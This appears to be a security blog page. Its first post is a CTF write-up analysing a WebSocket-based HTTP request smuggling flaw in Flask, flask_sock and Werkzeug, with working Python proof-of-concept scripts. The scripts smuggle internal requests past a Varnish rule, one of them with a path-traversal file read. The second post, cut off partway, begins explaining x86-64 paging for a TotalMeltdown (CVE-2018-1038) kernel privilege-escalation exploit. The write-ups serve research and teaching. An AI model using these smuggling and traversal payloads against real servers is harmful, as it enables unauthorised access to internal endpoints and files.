Thursday, August 17, 2023

a tale of a weird WebSocket based HTTP request smuggling bug

I recently played Securinets CTF, which have hosted a Web challenge Mark4Archive by @nzeros, which required to bypass this Varnish rule:

if (req.url ~ "^/api/pdf") {
    # Respond with a 403 Forbidden status
    return (synth(403, "Forbidden - Internal Endpoint"));
}
I, and most of the people who solved the challenge, bypassed the rule by just prepending more slashes to the start of the path so that the regex matching fails (e.g: //api/pdf). However when the CTF ended, the author disclosed the intended way to bypass the Varnish rule, it was an HTTP request smuggling using WebSockets. this is the block which handles WebSockets connection in the challenge's Varnish configuration file:
    if (req.http.upgrade ~ "(?i)websocket") {
        return (pipe);
    }
In case of a WebSocket connection Varnish returns pipe, which means Varnish will take from hereafter whatever the client sends to the same socket and forward it to the backend system, which makes sense in case of a WebSocket, where the traffic after the initial HTTP handshake is raw WebSocket binary frames which should be forwarded directly to the backend WebSocket server.

The challenge author's writeup has the PoC script to exploit the HTTP request smuggling issue, and references the technique disclosed some time ago by @0ang3el, you can read more about it here, TLDR is to trick the frontend server (e.g Varnish) to think that the backend has reserved the current socket for WebSocket connection, while the backend is not, so that the frontend server keeps the socket open with the backend, and you issue arbitrary HTTP requests bypassing the frontend server rules. but looking at the PoC script:


import socket
import os
req1 = '''GET /echo HTTP/1.1
Host: 20.197.61.105:80
Sec-WebSocket-Version: 13
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: qsdqsdqs
New: aaasaa

'''.replace('\n', '\r\n')


req2 = '''GET /api/pdf?p=../../../../../../../usr/src/app/config/__pycache__/config.cpython-37.pyc HTTP/1.1
Host: 20.197.61.105:80

'''.replace('\n', '\r\n')




def main(netloc):
    host, port = netloc.split(':')

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, int(port)))
    print("supposed connected")
    sock.sendall(req1.encode('utf-8'))
    data1 = sock.recv(4096).decode()
    print("data1 \n", data1)
    print("----------")

    sock.sendall(req2.encode('utf-8'))
    data = sock.recv(8192)

    print("data",data)

    sock.sendall(req2.encode('utf-8'))
    data = sock.recv(8192)

    print("data2",data)
    a = []
    #print(sock.recv(8192))
    start = False
    while (x:=sock.recv(2048)) != b"":
        if b"PDF-" in x:
            x = x[x.find(b"%PDF-"):]
            start = True
        if start:
            a.append(x)
        else:
            print(x)
    #print(a) 
    # print(sock.recv(8192))
    
    # print(sock.recv(2048))
    # print(sock.recv(2048))
    # print(sock.recv(1024))
    # print(sock.recv(1024))
    # print(sock.recv(1024))
    # print(sock.recv(1024))
    # print(sock.recv(1024))
    sock.shutdown(socket.SHUT_RDWR)
    sock.close()
    #data = b'%PDF-1.4\n\r\n40\r\n%\x93\x8c\x8b\x9e ReportLab Generated PDF document http://www.reportlab.com\n\r\n8\r\n1 0 obj\n\r\n3\r\n<<\n\r\n1e\r\n/F1 2 0 R /F2 3 0 R /F3 4 0 R\n\r\n3\r\n>>\n\r\n7\r\nendobj\n\r\n8\r\n2 0 obj\n\r\n3\r\n<<\n\r\n56\r\n/BaseFont /Helvetica /Encoding /WinAnsiEncoding /Name /F1 /Subtype /Type1 /Type /Font\n\r\n3\r\n>>\n\r\n7\r\nendobj\n\r\n8\r\n3 0 obj\n\r\n3\r\n<<\n\r\n5b\r\n/BaseFont /Helvetica-Bold /Encoding /WinAnsiEncoding /Name /F2 /Subtype /Type1 /Type /Font\n\r\n3\r\n>>\n\r\n7\r\nendobj\n\r\n8\r\n4 0 obj\n\r\n3\r\n<<\n\r\n54\r\n/BaseFont /Courier /Encoding /WinAnsiEncoding /Name /F3 /Subtype /Type1 /Type /Font\n\r\n3\r\n>>\n\r\n7\r\nendobj\n\r\n8\r\n5 0 obj\n\r\n3\r\n<<\n\r\n46\r\n/Contents 9 0 R /MediaBox [ 0 0 792 612 ] /Parent 8 0 R /Resources <<\n\r\n3c\r\n/Font 1 0 R /ProcSet [ /PDF /Text /ImageB /ImageC /ImageI ]\n\r\n17\r\n>> /Rotate 0 /Trans <<\n\r\n1\r\n\n\r\n4\r\n>> \n\r\ne\r\n  /Type /Page\n\r\n3\r\n>>\n\r\n7\r\nendobj\n\r\n8\r\n6 0 obj\n\r\n3\r\n<<\n\r\n2f\r\n/PageMode /UseNone /Pages 8 0 R /Type /Catalog\n\r\n3\r\n>>\n\r\n7\r\nendobj\n\r\n8\r\n7 0 obj\n\r\n3\r\n<<\n\r\nc2\r\n/Author (\\(anonymous\\)) /CreationDate (D:20230806025432+00\'00\') /Creator (\\(unspecified\\)) /Keywords () /ModDate (D:20230806025432+00\'00\') /Producer (ReportLab PDF Library - www.reportlab.com) \n\r\n44\r\n  /Subject (\\(unspecified\\)) /Title (\\(anonymous\\)) /Trapped /False\n\r\n3\r\n>>\n\r\n7\r\nendobj\n\r\n8\r\n8 0 obj\n\r\n3\r\n<<\n\r\n26\r\n/Count 1 /Kids [ 5 0 R ] /Type /Pages\n\r\n3\r\n>>\n\r\n7\r\nendobj\n\r\n8\r\n9 0 obj\n\r\n3\r\n<<\n\r\n34\r\n/Filter [ /ASCII85Decode /FlateDecode ] /Length 619\n\r\n3\r\n>>\n\r\n7\r\nstream\n\r\n275\r\nGasIe9p;&#%)(h*ka6O*A\'@H[qUWtkp95S**=#h9$T>t4$3.`&%D-=AdZME1M\'kG(gYi^:EVIZrJ<(SPY8hcmfam$2-AH=I?aA5N\'q^l*\'G=/ObQTWNPq+EGYFVnp_(Hma!He]S&&&K2]*.#\'"fsr_9f\'X6;lJkBI*f/?D.V[qC/&nu#MDnohS[6B"]"QGp=C!ulDF>8)[)Z&p2n[tG\'ju"#pVuT^_@/q_KBM88Xr5"k!J4&LJ"n*ZpuO?C5bUd8"0MED9"2*hBJgkD9>HQA^;PgF70o:o4lm#Zq-5(-t7mV=m0NhSKfX#gE_Vbi?4VZ1P/HG7T$\'OC]iXIlZ3Xjl8Ol\\h$P21$JC@(=>\'3?@Lc_(;R]3STjcm#[PapoF^*W9WG3tWd9PlBI<6d .enigf7="" e.7hcwy-="" e:rthj="" j="" lc="" lh7nundf="" ll1="" o8oaw="" pr="" q="" qwn="" rt="" rvgsqech9gx1="">.X"_lpQoq(umf&]k0I>.J[8X,T2BdOV>g_lAQ\'B08X@`0Elkq:\\W0aH,\'"=-4IT,V4_M?nV7pt-eQg\'MTrr^f5e$`rZYbC#;ErFjT~>endstream\n\r\n7\r\nendobj\n\r\n5\r\nxref\n\r\n5\r\n0 10\n\r\n14\r\n0000000000 65535 f \n\r\n14\r\n0000000073 00000 n \n\r\n14\r\n0000000124 00000 n \n\r\n14\r\n0000000231 00000 n \n\r\n14\r\n0000000343 00000 n \n\r\n14\r\n0000000448 00000 n \n\r\n14\r\n0000000641 00000 n \n\r\n14\r\n0000000709 00000 n \n\r\n14\r\n0000000992 00000 n \n\r\n14\r\n0000001051 00000 n \n\r\n8\r\ntrailer\n\r\n3\r\n<<\n\r\n5\r\n/ID \n\r\n47\r\n[<43143a1b321f0a753a89d946df872565><43143a1b321f0a753a89d946df872565>]\n\r\n48\r\n% ReportLab generated PDF document -- digest (http://www.reportlab.com)\n\r\n1\r\n\n\r\nc\r\n/Info 7 0 R\n\r\nc\r\n/Root 6 0 R\n\r\n9\r\n/Size 10\n\r\n3\r\n>>\n\r\na\r\nstartxref\n\r\n5\r\n1760\n\r\n6\r\n%%EOF\n\r\n0\r\n\r\n'.replace(b'\r\n', b'')
    data= b''.join(a).replace(b'\r\n', b'')
    print(data)

    it = 0
    idx = data.find(b'\n')
    parsed = data[:idx+1]
    data = data[idx:]

    while (idx := data.find(b'\n')) != -1:
        print("parsed", parsed)
        data = data[idx+1:]
        print("data", data[:50])
        offsetEnd = 1
        offset = int(b"0x"+data[:offsetEnd], 16)
        if offset == 0:
            break
        while data[offsetEnd:][offset-1] != 10:
            #print(data[offsetEnd:])
            #print(offset, data[offsetEnd:][offset])
            offsetEnd += 1
            offset = int(b"0x"+data[:offsetEnd], 16)
        print("toadd", data[offsetEnd:][:offset])
        parsed += data[offsetEnd:][:offset]
        
        print(parsed)
        it +=1
        if it == 2:
            pass

    if os.path.exists("output_sol.pdf"):
        os.remove("output_sol.pdf")
    with open('output_sol.pdf', 'wb') as f:
        f.write(parsed)

if __name__ == "__main__":
    main('20.197.61.105:80')
you will notice that the WebSocket handshake is actually valid, and the backend indeed honors it, and returns 101 Upgrade WebSocket. although the PoC is working and /api/pdf is hit and response is retrieved, this is clearly not a Varnish issue, as the WebSocket handshake is done and it is valid, so there is no "tricking" here. but rather the backend system somehow executes HTTP requests although they are sent down the WebSocket stream.

to confirm this, i created a minimal backend that has an HTTP endpoint and a WebSocket endpoint, edited the PoC to GET /internal instead of /api/pdf, run the PoC directly on the minimal backend (no Varnish at all) and my guess was right, the app returned 101 Upgrade, followed by WebSocket messages, then the response of the "smuggled" request to /internal. this is the minimal backend:
from flask import Flask, Response
from flask_sock import Sock
import time

import json

app = Flask(__name__)
sock = Sock(app)

@app.route('/internal')
def internal():
    return "ACCESS GRANTED", 200

@sock.route('/echo')
def echo(sock):
    total_size = 100
    progress = 0
    while progress < total_size:
        time.sleep(0.1)
        progress += 10
        sock.send(json.dumps({'progress': progress}))
    return "complete!"

if __name__ == '__main__':
    app.run()


now it is clear that the issue is in flask_sock or some other Python component and not Varnish, after several hours of debugging it turned out that whats happening was that the whole socket input was taken as a pipelined HTTP request or at least in Python's http.server realm.

this is an example of an HTTP request that uses pipelining:

GET /first HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive GET /second HTTP/1.1 Host: 127.0.0.1 Connection: close

if you try pipelining HTTP requests directly on the app it won't work:


because Werkzeug does not support it, and always returns Connection: close header. here is the relevant snippet:
	# Always close the connection. This disables HTTP/1.1
	# keep-alive connections. They aren't handled well by
	# Python's http.server because it doesn't know how to
	# drain the stream before the next request line.
	self.send_header("Connection", "close")
	self.end_headers()
But http.server's BaseHTTPRequestHandler does support it, you just need to set protocol_version property of the handler to HTTP/1.1 or higher:


Werkzeug does set its protocol_version to HTTP/1.1, here is the relevant code:
        # If the handler doesn't directly set a protocol version and
        # thread or process workers are used, then allow chunked
        # responses and keep-alive connections by enabling HTTP/1.1.
        if "protocol_version" not in vars(handler) and (
            self.multithread or self.multiprocess
        ):
            handler.protocol_version = "HTTP/1.1"
but it does not work, because of this snippet:

	# Always close the connection. This disables HTTP/1.1
	# keep-alive connections. They aren't handled well by
	# Python's http.server because it doesn't know how to
	# drain the stream before the next request line.
	self.send_header("Connection", "close")
	self.end_headers()
self.send_header() sets a flag which prevents http.server's BaseHTTPRequestHandler from continuing reading from the socket (and thus handling only the first request):
    def send_header(self, keyword, value):
        """Send a MIME header to the headers buffer."""
        if self.request_version != 'HTTP/0.9':
            if not hasattr(self, '_headers_buffer'):
                self._headers_buffer = []
            self._headers_buffer.append(
                ("%s: %s\r\n" % (keyword, value)).encode('latin-1', 'strict'))

        if keyword.lower() == 'connection':
            if value.lower() == 'close':
                self.close_connection = True
            elif value.lower() == 'keep-alive':
                self.close_connection = False
if the header is connection and the value is close, self.close_connection is set to True, this flag is what keeps BaseHTTPRequestHandler handler routine looking for more HTTP requests in the same socket. as you can see here:
    def handle(self):
        """Handle multiple requests if necessary."""
        self.close_connection = True

        self.handle_one_request()
        while not self.close_connection:
            self.handle_one_request()
it is set to True by default which means handle only one request, but it is set later on to False in case the connection header value is not close and HTTP version is >=1.1 inside handle_one_request method, now you might be wondering why does this work with WebSockets, we know that Werkzeug always calls set_header with connection: close after each route has completed executing which should set self.close_connection to True and break the looplets have a look into flask_sock code:
        def decorator(f):
            @wraps(f)
            def websocket_route(*args, **kwargs):  # pragma: no cover
                ws = Server(request.environ, **current_app.config.get(
                    'SOCK_SERVER_OPTIONS', {}))
                try:
                    f(ws, *args, **kwargs)
                except ConnectionClosed:
                    pass
                try:
                    ws.close()
                except:  # noqa: E722
                    pass

                class WebSocketResponse(Response):
                    def __call__(self, *args, **kwargs):
                        if ws.mode == 'eventlet':
                            try:
                                from eventlet.wsgi import WSGI_LOCAL
                                ALREADY_HANDLED = []
                            except ImportError:
                                from eventlet.wsgi import ALREADY_HANDLED
                                WSGI_LOCAL = None

                            if hasattr(WSGI_LOCAL, 'already_handled'):
                                WSGI_LOCAL.already_handled = True
                            return ALREADY_HANDLED
                        elif ws.mode == 'gunicorn':
                            raise StopIteration()
                        elif ws.mode == 'werkzeug':
                            raise ConnectionError()
                        else:
                            return []

                return WebSocketResponse()
this is the decorator of the routes defined by @sock.route f() is the decorated route, every time an HTTP request is received at the defined route using @sock.route websocket_route is ran. it initiates a new Server from simple-websocket package. and calls the route with the initiated Server object.

handshake method is called up on Server initiation:
    def handshake(self):
        in_data = b'GET / HTTP/1.1\r\n'
        for key, value in self.environ.items():
            if key.startswith('HTTP_'):
                header = '-'.join([p.capitalize() for p in key[5:].split('_')])
                in_data += f'{header}: {value}\r\n'.encode()
        in_data += b'\r\n'
        self.ws.receive_data(in_data)
        self.connected = self._handle_events()
it builds back the HTTP handshake request using the parsed headers as the original request is already consumed by the HTTP server, once it is built it is feed to WebSocket stream using receive_data method, self.ws.events() yields a handshake Request event that is handled by _handle_events method.

    def _handle_events(self):
        keep_going = True
        out_data = b''
        for event in self.ws.events():
            try:
                if isinstance(event, Request):
                    self.subprotocol = self.choose_subprotocol(event)
                    out_data += self.ws.send(AcceptConnection(
                        subprotocol=self.subprotocol,
                        extensions=[PerMessageDeflate()]))
                elif isinstance(event, CloseConnection):
                    if self.is_server:
                        out_data += self.ws.send(event.response())
                    self.close_reason = event.code
                    self.close_message = event.reason
                    self.connected = False
                    self.event.set()
                    keep_going = False
                elif isinstance(event, Ping):
                    out_data += self.ws.send(event.response())
                elif isinstance(event, Pong):
                    self.pong_received = True
                elif isinstance(event, (TextMessage, BytesMessage)):
                    self.incoming_message_len += len(event.data)
                    if self.max_message_size and \
                            self.incoming_message_len > self.max_message_size:
                        out_data += self.ws.send(CloseConnection(
                            CloseReason.MESSAGE_TOO_BIG, 'Message is too big'))
                        self.event.set()
                        keep_going = False
                        break
                    if self.incoming_message is None:
                        # store message as is first
                        # if it is the first of a group, the message will be
                        # converted to bytearray on arrival of the second
                        # part, since bytearrays are mutable and can be
                        # concatenated more efficiently
                        self.incoming_message = event.data
                    elif isinstance(event, TextMessage):
                        if not isinstance(self.incoming_message, bytearray):
                            # convert to bytearray and append
                            self.incoming_message = bytearray(
                                (self.incoming_message + event.data).encode())
                        else:
                            # append to bytearray
                            self.incoming_message += event.data.encode()
                    else:
                        if not isinstance(self.incoming_message, bytearray):
                            # convert to mutable bytearray and append
                            self.incoming_message = bytearray(
                                self.incoming_message + event.data)
                        else:
                            # append to bytearray
                            self.incoming_message += event.data
                    if not event.message_finished:
                        continue
                    if isinstance(self.incoming_message, (str, bytes)):
                        # single part message
                        self.input_buffer.append(self.incoming_message)
                    elif isinstance(event, TextMessage):
                        # convert multi-part message back to text
                        self.input_buffer.append(
                            self.incoming_message.decode())
                    else:
                        # convert multi-part message back to bytes
                        self.input_buffer.append(bytes(self.incoming_message))
                    self.incoming_message = None
                    self.incoming_message_len = 0
                    self.event.set()
                else:  # pragma: no cover
                    pass
            except LocalProtocolError:  # pragma: no cover
                out_data = b''
                self.event.set()
                keep_going = False
        if out_data:
            self.sock.send(out_data)
        return keep_going
out_data would be the HTTP upgrade response and it will be sent to the client by the WebSocket server itself in the socket, without Werkzeug interaction.

at this point Werkzeug is still waiting for the route to finish its execution and return the response:
        def execute(app: WSGIApplication) -> None:
            application_iter = app(environ, start_response)
            try:
                for data in application_iter:
                    write(data)
                if not headers_sent:
                    write(b"")
                if chunk_response:
                    self.wfile.write(b"0\r\n\r\n")
            finally:
                # Check for any remaining data in the read socket, and discard it. This
                # will read past request.max_content_length, but lets the client see a
                # 413 response instead of a connection reset failure. If we supported
                # keep-alive connections, this naive approach would break by reading the
                # next request line. Since we know that write (above) closes every
                # connection we can read everything.
                selector = selectors.DefaultSelector()
                selector.register(self.connection, selectors.EVENT_READ)
                total_size = 0
                total_reads = 0

                # A timeout of 0 tends to fail because a client needs a small amount of
                # time to continue sending its data.
                while selector.select(timeout=0.01):
                    # Only read 10MB into memory at a time.
                    data = self.rfile.read(10_000_000)
                    total_size += len(data)
                    total_reads += 1

                    # Stop reading on no data, >=10GB, or 1000 reads. If a client sends
                    # more than that, they'll get a connection reset failure.
                    if not data or total_size >= 10_000_000_000 or total_reads > 1000:
                        break

                selector.close()
Flask app is called in the first line, app() is responsible for resolving the routes internally and calling the right route handler, in this case its websocket_route then echo method, that will sleep 1 second then return. but looking closely at websocket_route you will notice that our returned response (e.i: "complete!") is not used at all, websocket_route does not even capture the return value of echo method. instead it returns WebSockerResponse() object:


                class WebSocketResponse(Response):
                    def __call__(self, *args, **kwargs):
                        if ws.mode == 'eventlet':
                            try:
                                from eventlet.wsgi import WSGI_LOCAL
                                ALREADY_HANDLED = []
                            except ImportError:
                                from eventlet.wsgi import ALREADY_HANDLED
                                WSGI_LOCAL = None

                            if hasattr(WSGI_LOCAL, 'already_handled'):
                                WSGI_LOCAL.already_handled = True
                            return ALREADY_HANDLED
                        elif ws.mode == 'gunicorn':
                            raise StopIteration()
                        elif ws.mode == 'werkzeug':
                            raise ConnectionError()
                        else:
                            return []

                return WebSocketResponse()
in our case, ws.mode is werkzeug, so ConnectionError() is raised. which is caught here:
    def run_wsgi(self) -> None:
        if self.headers.get("Expect", "").lower().strip() == "100-continue":
            self.wfile.write(b"HTTP/1.1 100 Continue\r\n\r\n")

        self.environ = environ = self.make_environ()
        status_set: str | None = None
        headers_set: list[tuple[str, str]] | None = None
        status_sent: str | None = None
        headers_sent: list[tuple[str, str]] | None = None
        chunk_response: bool = False
        
        [snipped]
        
        try:
            execute(self.server.app)
        except (ConnectionError, socket.timeout) as e:
            self.connection_dropped(e, environ)
        except Exception as e:
            if self.server.passthrough_errors:
                raise

            if status_sent is not None and chunk_response:
                self.close_connection = True

            try:
                # if we haven't yet sent the headers but they are set
                # we roll back to be able to set them again.
                if status_sent is None:
                    status_set = None
                    headers_set = None
                execute(InternalServerError())
            except Exception:
                pass

            from .debug.tbtools import DebugTraceback

            msg = DebugTraceback(e).render_traceback_text()
            self.server.log("error", f"Error on request:\n{msg}")
self.connection_dropped is called, defined here:
    def connection_dropped(
        self, error: BaseException, environ: WSGIEnvironment | None = None
    ) -> None:
        """Called if the connection was closed by the client.  By default
        nothing happens.
        """
the function does nothing, run_wsgi returns, marking the end of the current request (GET /echo), leaving self.close_connection set to False, BaseHTTPRequestHandler continues handling the rest of the HTTP requests in the socket, thinking that this is a pipelined HTTP request. 
it should be noted that at this point the socket is closed, as websocket_route have called ws.close(), which closes the socket:
    def close(self, reason=None, message=None):
        super().close(reason=reason, message=message)
        self.sock.close()
BaseHTTPRequestHandler is able to read remaining data in the socket without exceptions, because it does not use the socket instead it has a file object that represents the socket (e.i: self.rfile), this is the setup method of the class:
    def setup(self):
        self.connection = self.request
        if self.timeout is not None:
            self.connection.settimeout(self.timeout)
        if self.disable_nagle_algorithm:
            self.connection.setsockopt(socket.IPPROTO_TCP,
                                       socket.TCP_NODELAY, True)
        self.rfile = self.connection.makefile('rb', self.rbufsize)
        if self.wbufsize == 0:
            self.wfile = _SocketWriter(self.connection)
        else:
            self.wfile = self.connection.makefile('wb', self.wbufsize)
now that we understand the issue better, here is a simple script that GETs /internal:
import socket

req3 = '''GET /echo HTTP/1.1
Host: localhost
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Upgrade: websocket
Origin: http://127.0.0.1
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Sec-WebSocket-Key: V4XssCMN39pL17Emy4b7mQ==

GET /internal HTTP/1.1

'''

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", int("5000")))
print("connected")

sock.sendall(req3.encode('utf-8'))
while True:
    data = sock.recv(8192)
    if data == b'':
        break
    print(data.decode(errors='ignore'))
which gives:


there is one issue left, if the WebSocket route was reading data from the socket it would consume our second HTTP request, lets change our minimal backend and test that:


from flask import Flask, Response
from flask_sock import Sock
import time

import json

app = Flask(__name__)
sock = Sock(app)

@app.route('/internal')
def internal():
    return "ACCESS GRANTED", 200

@sock.route('/echo')
def echo(sock):
    while True:
        data = sock.receive()
        sock.send(data)

if __name__ == '__main__':
    app.run()
if you run the same exploit against this new backend, it won't work, cause sock.receive() call will consume our second HTTP request as WebSocket data. to fix that we can abuse the polling background thread of simple-websocket, if this thread receives invalid WebSocket data it sets self.connected to False, this is the thread routine:
    def _thread(self):
        sel = None
        if self.ping_interval:
            next_ping = time() + self.ping_interval
            sel = self.selector_class()
            sel.register(self.sock, selectors.EVENT_READ, True)

        while self.connected:
            try:
                if sel:
                    now = time()
                    if next_ping <= now or not sel.select(next_ping - now):
                        # we reached the timeout, we have to send a ping
                        if not self.pong_received:
                            self.close(reason=CloseReason.POLICY_VIOLATION,
                                       message='Ping/Pong timeout')
                            break
                        self.pong_received = False
                        self.sock.send(self.ws.send(Ping()))
                        next_ping = max(now, next_ping) + self.ping_interval
                        continue
                in_data = self.sock.recv(self.receive_bytes)
                if len(in_data) == 0:
                    raise OSError()
            except (OSError, ConnectionResetError):  # pragma: no cover
                self.connected = False
                self.event.set()
                break

            self.ws.receive_data(in_data)
            self.connected = self._handle_events()
        sel.close() if sel else None
        self.sock.close()
it receives data then calls self._handle_events which returns False, in case of invalid WebSocket data, self.connected is set to False, and the background thread exits, the WebSocket route will try to call sock.receive but a ConnectionClosed exception will be thrown:

        def receive(self, timeout=None):
        """Receive data over the WebSocket connection.

        :param timeout: Amount of time to wait for the data, in seconds. Set
                        to ``None`` (the default) to wait indefinitely. Set
                        to 0 to read without blocking.

        The data received is returned, as ``bytes`` or ``str``, depending on
        the type of the incoming message.
        """
        while self.connected and not self.input_buffer:
            if not self.event.wait(timeout=timeout):
                return None
            self.event.clear()
        if not self.connected:  # pragma: no cover
            raise ConnectionClosed(self.close_reason, self.close_message)
        return self.input_buffer.pop(0)
the exception will be caught by websocket_route and again it will return and leave the socket free to use, here is the new poc:

    import socket

    req1 = '''GET /echo HTTP/1.1
    Host: localhost
    Connection: Upgrade
    Pragma: no-cache
    Cache-Control: no-cache
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
    Upgrade: websocket
    Origin: http://127.0.0.1
    Sec-WebSocket-Version: 13
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Sec-WebSocket-Key: V4XssCMN39pL17Emy4b7mQ==

    '''
    req2 = '''GET /internal HTTP/1.1

    '''

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("127.0.0.1", int("5000")))
    print("connected")

    sock.sendall(req1.encode('utf-8'))
    print(sock.recv(8192).decode(errors='ignore'))

    sock.sendall(("A"*4096).encode('utf-8'))
    __import__("time").sleep(2)
    print(sock.recv(8192).decode(errors='ignore'))

    sock.sendall(req2.encode('utf-8'))
    while True:
        data = sock.recv(8192)
        if data == b'':
            break
        print(data.decode(errors='ignore'))
 

Monday, November 29, 2021

Exploiting TotalMeltdown: the fine way

CVE-2018-1038 aka TotalMeltdown is quite an old bug (2018) but still an awesome bug so i decided to write a decent exploit for it.

The vulnerability was discovered by @ulffrisk, The first functioning LPE PoC was released by @xpn and he also wrote a blog about it you can find it here, i used @xpn's blogpost to write the first exploit however though it is working the exploit kept crashing the system as it overwrite some critical memory regions and also the raw physical memory search takes ages, so i wrote another clean exploit which i will walk you through in this post.

TotalMeltdown


CVE-2018-1038 is a logical bug caused by setting a bit (U/S) which was not supposed to be set in one of the PML4 (Page Map Level 4) entries by Microsoft after mitigating the Meltdown Vulnerability.

Microsoft by setting the U/S (User/Supervisor) bit in the PML4 entry at index 0x1ED it allowed any usermode/ring3 program to access any physical memory mapped to this particular entry, however the catch here is that the PML4 entry 0x1ED was actually a Self Ref PML4 entry which makes it worse than just reading and writing to a the physical memory mapped to this entry!

Paging 101


As you may already know the addresses used by the programs to reference the memory are not really the real memory addresses used to address the physical memory installed in your computer, those addresses are called Virtual Addresses and must be translated first to Physical Addresses, this is usually done by the MMU unit in your CPU. the Virtual Addressing is provided via enabling the Paging in the CPU (this is done by the OS in the early stages of booting).

So how is this Virtual Address is translated anyway? well let's first see what a Virtual Address is:

As you can see the Virtual Address is just a bunch of offsets (or indexes) in some tables, and by understanding these tables we can eventually understand paging.

Those are 4 tables (in long mode paging e.i: PAE enabled and 4KiB page size) required by the paging mechanism to be setup before enabling the paging (otherwise the system will crush after enabling the paging), those tables are required to be setup because once the OS enables the paging (setting the PG bit in the CR0 register) every address afterwards is deemed to be a virtual address and will be translated by the MMU. each table is of size of 4KiB and holds 512 entries ( 4KiB / 8 ).

the first table and the top in the hierarchy is the Page Map Level 4 table PML4 for short there is only 1 PML4 per process, the second is the PDP or Page Directory Pointer table, every entry in the PML4 holds the base address of a PDP table so they are up to 512 tables in case of using all the entries in PML4 table, and next is the PD or the Page Directory table which is also up to 512 table, and finally the PT or the Page Table also up to 512 tables.

How those pages are linked and work together is quite simple, every entry of these tables (8 bytes on x86-64) is a physical address to the next table starting from the PML4 to the PT. And every offset (or index) in the Virtual Address being translated is used within that table.

For example if the PML4 physical address is 0x1000 (table addresses are always page aligned and their size is same as page size e.i 4KiB) and the PML4 index of this virtual address is 0xe4, then to MMU would extract the address of the next table (PDP) by reading the entry at base of the table + index * size of entry (8 on x86-64) which is 0x1000 + (0xe4 * 8) = 0x1720.

Here is how the full translation is done:
in the end of the day a physical address is obtained via reading the entry in the PT, this physical address points to a physical page/frame, the 12 bits offset is used within this page to access any position in it.

let's try to translate this virtual address: 0xfffffa80018ab040 which is the address of the System's EPROCESS in my testing VM, first let's get the indexes:
  • first 12 bits are the offset in the page: 0x40
  • next 9 bits of the PT index: 0xab
  • next 9 bits of the PD index: 0xc
  • next 9 bits of the PDP index: 0
  • next 9 bits of the PML4 index: 0x1f5
  • the most significant 16 bits: 0xffff.

For a Virtual Address to be a valid address it should be a canonical address meaning the most significant 16 bits of a Virtual Address should be the sign extend of the last bit of the PML4 index, so if the last bit of the PML4 index is set to 1 this should be all 1 (0xFFFF), and if it is 0 then these 16 bits are all set to 0 (0x0000).

Any other value for this 16 bits other than 0x0000 and 0xffff means the address is not canonical thus invalid and will result in a #GP fault. why is this in the first place? Currently only 48 bits virtual addresses are being used (9 bits PML4 index + 9 bits PDP index + 9 bits PD index + 9 bits PT index + 12 bits offset) which allows mapping 256 terabytes of physical memory and using only 4 paging tables (instead of 6 tables in case of full use of 64 bit virtual addresses).

the designers could just make the CPU ignore whatever is in the upper 16 bits but then the programmers would take advantage of this "free" 16 bits to store extra informations, and then when the CPU designers eventually decide to extend the bits of the virtual addresses the code built to take advantage of the "free" unused upper 16 bits will break, so they just prevented this from happening with this canonical addresses concept.

which makes the valid virtual addresses ranges are:
  • 0x0000000000000000-0x00007fffffffffff (generally used for userspace defers per process)
  • 0xffff800000000000-0xffffffffffffffff (generally used for kernel space and mapped on every process or at least before the Meltdown vulnerability, see: KVAS/KPTI)

the first thing to do is to get the physical address of the base of the PML4 table, so we can add to it our PML4 index 0x1fc. this address as shown in the picture above is in the CR3 register:


that's 0x187000, we add to it the PML4 index 0x1fc times the size of entry which is 8 bytes which gives 0x187fa8



we read what's in this PML4 entry (!dq is used to read QWORD from a given 
physical address and the L parameter is used to shows only 1 QWORD):


well that value is not aligned on page boundary? I haven't talked about this earlier, but each entry of the tables is an address to the next table (always aligned on page boundary), but also contains some flags.

src: Intel developer system programming manual

the flags are in the lower 12 bits and in the upper 16 bits, so we just clear them to get the physical address, however only the lower 12 bits flags are being used, there is only one flag in the upper 16 bits XD (Execute Disable) and it is also reserved (must be set to 0) if ia32_efer.nxe = 0 and the page is present, which makes most of the upper 16 bits reserved/ignored:

src: Intel developer system programming manual

You might notice from the picture above that the CR3 also contains flags, i didn't mention that before because in our case the CR3 has no flags (as .formats command above shows).

so we have 0x4000863 we clear the flags:


this is the PDP table base address, we add the PDP index * 8, the index is 0 so the the address is the same, we read the entry and clear the flags:



the PD table base is 0x4001000 we add the PD index 0xc * 8, read the entry and clear the flags:



the PT base address is 0x580d000 we add the PT index 0xab * 8 and clear the flags:



Now 0x7ff6a000 is the physical address of the page we will add the 12 bits offset 0x40 to:



And that's it! we got the physical address of 0xfffffa80018ab040 which is 0x7ff6a040.

We can verify the translation with !vtop windbg command which translates virtual addresses to physical addresses, the argument 0 means use the current process (System) context, because every process has its own PML4 table meaning if you translate an address from a process with another process's PML4 table and subsequently the other tables the translation will be wrong, though this is irrelevant for kernel addresses because they are mapped in the upper half of the PML4 table of every process.



seems our math is OK! now about the flags we can use the !pte command to translate the virtual address 0xfffffa80018ab040 and also show the flags:



those are the flags under each table base, V stands for valid and K for a Hypervisor/Kernel mode page (code running in ring3 can't access these pages, the opposite of this flag is the U (usermode) flag which grants access to the ring3 code), W stands for read and writable (the opposite is R which means read only), you can find all the flags in !pte docs or in the Intel manual. you can also see the table bases are the same as we read from the entries during our translation process.

Self Ref Entry


the self ref entry trick or self reference entry is a trick osdevs use to access any entry on any of the 4 tables without any extra structures or custom code, all what is needed is to add a PML4 entry which points to the PML4 tables itself i.e: the entry contains the physical address of the PML4 tables just like the CR3 register.

how will this allow us to access any table? well here is an example:

consider the entry at index 266 in the PML4 of our imaginary os is a self ref entry, the PML4 table will be similar to this one:

relevant flags are in green: K stands for Hypervisor/Kernel mode, U for usermode

